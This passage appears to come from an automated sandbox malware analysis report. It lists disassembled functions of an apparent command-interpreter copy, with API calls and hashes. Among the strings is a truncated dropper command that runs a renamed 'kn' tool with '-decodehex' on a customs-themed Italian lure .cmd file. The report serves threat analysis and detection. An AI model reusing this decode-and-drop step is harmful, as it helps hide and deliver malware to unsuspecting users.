                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID:
                                                      • API String ID: 2221118986-0
                                                      • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                      • Instruction ID: 949c500cb173571034c3ff60e986ffb564b611ad2e03e88f6bb6363581f32aa7
                                                      • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                      • Instruction Fuzzy Hash: 3CF0B421B0978540EB44D756B94126A92919B88BF0B888332EA7D47BC5DF7CD452C701

                                                      Non-executed Functions

                                                      Function 00007FF7E1DD7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7F44
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD7F5C
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7F9E
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7FFF
                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8020
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8036
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8061
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD8075
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD80D6
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD80EA
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD8177
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD819A
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD81BD
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD81DC
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD81FB
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD821A
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD8239
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8291
                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD82D7
                                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD82FB
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD831A
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8364
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD8378
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD839A
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD83AE
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD83E6
                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8403
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8418
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                      • API String ID: 3637805771-3100821235
                                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                      • Instruction ID: 50b8edd5e4967aa8ef46c3fbe87ce29722abfbdbb7da3e4a53c604d6d72cf0f7
                                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                      • Instruction Fuzzy Hash: 1DE1B371E08A528AE714EF65E401279FBA1FB89B95BC48236CD0E83794DFBCA454C721
                                                      Function 00007FF7E1DB7650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                      • String ID: DPATH
                                                      • API String ID: 95024817-2010427443
                                                      • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                      • Instruction ID: d2b2fc0f614502a16793e8695fb2de72e3948192ca774fda0629f41a764c7a8c
                                                      • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                      • Instruction Fuzzy Hash: A712E932A0868297EB25EF259441379F7A1FF89754F84523AEA4E53B94DF7CE400CB12
                                                      Function 00007FF7E1DB6EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                      • API String ID: 1795611712-3662956551
                                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                      • Instruction ID: e221b39cc7f47288ab9205f581d82e3da46226a49a7ba4837ed2038dd9771ab8
                                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                      • Instruction Fuzzy Hash: A7E1C362E0C64296E711EB64A8427B9E7A1FF48784FC44233D90E87698DFBCE544C762
                                                      Function 00007FF7E1DDEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcsupr.MSVCRT ref: 00007FF7E1DDEF33
                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEF98
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFA9
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFBF
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7E1DDEFDC
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFED
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF003
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF022
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF083
                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF092
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF0A5
                                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7E1DDF0DB
                                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF135
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF16C
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF185
                                                        • Part of subcall function 00007FF7E1DC01B8: _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                        • Part of subcall function 00007FF7E1DC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                      • String ID: <noalias>$CMD.EXE
                                                      • API String ID: 1161012917-1690691951
                                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                      • Instruction ID: bc9efa534f7194d580a059115afa4fb9067c02078aa670097b56e4856e0557a9
                                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                      • Instruction Fuzzy Hash: 74918422F0965296FB15FB70D4423BDBAA0AF49B59F848236DD0E43794DFBCA445C322
                                                      Function 00007FF7E1DBCE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\, xrefs: 00007FF7E1DCC9F1
                                                      • GOTO, xrefs: 00007FF7E1DBD0A3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                      • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\$GOTO
                                                      • API String ID: 3863671652-1122420156
                                                      • Opcode ID: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                      • Instruction ID: a5d8bd550043e07c831d4c9aab387525c9e481b949d0ad55120c46f19a3550e0
                                                      • Opcode Fuzzy Hash: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                      • Instruction Fuzzy Hash: 1BE1DE22E0D64292FB64FB1594567B9E6A0BF89784FC84537DA0E422D0DFBCE841C763
                                                      Function 00007FF7E1DB2220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$BufferConsoleInfoScreen
                                                      • String ID:
                                                      • API String ID: 1034426908-0
                                                      • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                      • Instruction ID: 1e2b05eb7fc18875babc9126ddd7b3df1e1bebb1f2a674aa9e18998d8d1fa8a2
                                                      • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                      • Instruction Fuzzy Hash: 82F1A032A097829AEB64EF21D8427E9A7A0FF45784F808136DA4E47795DFBCF504C721
                                                      Function 00007FF7E1DDAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAA85
                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAACF
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAAEC
                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDAB39
                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDAB6F
                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDABA4
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDABCB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteValue$CreateOpen
                                                      • String ID: %s=%s
                                                      • API String ID: 1019019434-1087296587
                                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                      • Instruction ID: eeaca4c8d1d37fa740226598ca499e0b83d55dd0b0ec19b041cae7c1b70f8bb8
                                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                      • Instruction Fuzzy Hash: AF51A531B0875296E760EB25A8467BAF7A1FB89791F81C236CA4D83790DFBCD442C711
                                                      Function 00007FF7E1DB4A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$FullNamePathwcsrchr
                                                      • String ID:
                                                      • API String ID: 4289998964-0
                                                      • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                      • Instruction ID: 46ebeda9c88c80cf5cf1044ef5107596b48eb29a0c16b1f0f72b54442335a940
                                                      • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                      • Instruction Fuzzy Hash: 14C1C311E0935692EFA4FB51954A779A3A0FB45B90F815632CE0E077D0DFBCA491C362
                                                      Function 00007FF7E1DB8DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID:
                                                      • API String ID: 2221118986-0
                                                      • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                      • Instruction ID: 931aa7ff86b1b35f3231b549eb772980d6f29d3d8ec5840036c79809ba846e1b
                                                      • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                      • Instruction Fuzzy Hash: F9C1F562E0978296EB64EB20E852BF9A3A0FB94784F844536DA0F07794DFBCE551C311
                                                      Function 00007FF7E1DBD250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 2081463915-1994581435
                                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                      • Instruction ID: cec4c7b3183c80703036b39bd2b6680e02f83b4e6cb631473a830adaf79e0424
                                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                      • Instruction Fuzzy Hash: 9D71BC20E08642A5FB64FB24A8867B9A6E0AF05759FC4453BD50F432A5DFFCA4918322
                                                      Function 00007FF7E1DC02A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
